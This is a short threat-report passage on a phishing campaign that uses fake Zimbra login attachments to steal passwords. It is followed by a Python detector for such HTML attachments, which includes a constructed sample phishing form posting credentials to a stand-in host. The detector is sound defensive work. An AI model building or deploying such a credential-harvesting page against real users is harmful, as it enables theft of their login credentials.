In these phishing emails, the attackers impersonate the victim organization’s administrator and inform the recipient that their email server is scheduled for an update. The email claims that this update could lead to inbox inaccessibility or even termination. To prevent this, the victim is instructed to open an HTML attachment for further instructions.
The attachment, however, does not contain any instructions. Instead, it presents a fake Zimbra login page with the victim’s username prefilled. If the user enters their password, it is sent to the attacker’s server via an HTTPS POST request.
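A defender-side check for the attachment described above, added here as an example and not taken from the original report: it flags an HTML attachment whose form asks for a password, submits to a host outside the organization's own mail hosts, and has the recipient's address prefilled. The sample HTML, the host names and the `scan_attachment` helper are constructed for illustration, and the check assumes the page submits through `<form>` markup rather than from script.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class _FormScan(HTMLParser):
    """Collects each <form> with its action, method and input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""),
                         "method": a.get("method", "get").lower(),
                         "inputs": []}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            self._cur["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def scan_attachment(html, recipient, trusted_hosts):
    """Return reasons an HTML attachment looks like a credential-harvesting page."""
    scanner = _FormScan()
    scanner.feed(html)
    findings, local = [], recipient.split("@")[0].lower()
    for form in scanner.forms:
        inputs = form["inputs"]
        if not any(i.get("type", "").lower() == "password" for i in inputs):
            continue  # only forms that ask for a password are of interest
        findings.append("password-form-in-attachment")
        url = urlparse(form["action"])
        if url.scheme in ("http", "https") and url.hostname not in trusted_hosts:
            findings.append(f"{form['method']}-to-untrusted-host:{url.hostname}")
        if any(i.get("value", "").lower() in (recipient.lower(), local) for i in inputs):
            findings.append("recipient-prefilled")
    return findings

# Constructed sample attachment (not a real campaign artifact).
SAMPLE = """<html><body><form action="https://collect.example.net/auth" method="POST">
<input type="text" name="username" value="alice@corp.example" readonly>
<input type="password" name="password">
<input type="submit" value="Sign in"></form></body></html>"""

if __name__ == "__main__":
    print(scan_attachment(SAMPLE, "alice@corp.example", {"mail.corp.example"}))
```
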